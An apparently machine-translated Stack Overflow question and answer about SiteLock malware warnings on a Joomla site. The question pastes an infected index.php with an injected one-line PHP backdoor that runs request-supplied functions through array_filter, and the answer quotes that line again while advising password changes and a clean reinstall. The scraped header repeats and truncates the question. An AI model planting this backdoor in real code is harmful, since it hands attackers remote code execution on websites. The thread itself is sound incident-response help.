如何确定在我的脚本中找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL的原因?
因此,恶意软件扫描的结果返回了以下信息: /sanaciondelalma/sanaciondelalma/configuration.php: 找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL /sanaciondelalma/sanaciondelalma/index.php: 找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL /sanaciondelalma/sanaciondelalma/images/mod_config.php: 找到SiteLock-PHP-BACKDOOR-GENERIC-md5-efg.non-official /sanaciondelalma/sanaciondelalma/templates/atomic/error.php: 找到SiteLock-PHP-BACKDOOR-GENERIC-md5-wef.non-official /pablofaro/images/mod_config.php: 找到SiteLock-PHP-BACKDOOR-GENERIC-md5-efg.non-official 我不知道如何在脚本中识别原因,这里是索引。你能帮忙吗如何确定在我的脚本中找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL的原因?,php,joomla,Php,Joomla,因此,恶意软件扫描的结果返回了以下信息: /sanaciondelalma/sanaciondelalma/configuration.php: 找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL /sanaciondelalma/sanaciondelalma/index.php: 找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL /sanaciondelalma/sanaciondelalma/images/mod_con
<?php
if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}
/**
* @package Joomla.Site
* @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);
if (file_exists(dirname(__FILE__) . '/defines.php')) {
include_once dirname(__FILE__) . '/defines.php';
}
if (!defined('_JDEFINES')) {
define('JPATH_BASE', dirname(__FILE__));
require_once JPATH_BASE.'/includes/defines.php';
}
require_once JPATH_BASE.'/includes/framework.php';
// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;
// Instantiate the application.
$app = JFactory::getApplication('site');
// Initialise the application.
$app->initialise();
// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
// Route the application.
$app->route();
// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
// Dispatch the application.
$app->dispatch();
// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
// Render the application.
$app->render();
// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;
// Return the response.
echo $app;
上面这条线不应该存在
这是恶意脚本注入代码的包装代码行
你应该怎么做
- 更改所有密码
- 对你的网站进行干净的安装,尽量避免使用未在joomla官方网站注册的提供商提供的免费软件模板和插件
我不知道,谢谢!
if ($_REQUEST['param1']&&$_REQUEST['param2'])
{
$f = $_REQUEST['param1'];
$p = array($_REQUEST['param2']);
$pf = array_filter($p, $f);
echo 'OK'; Exit;
}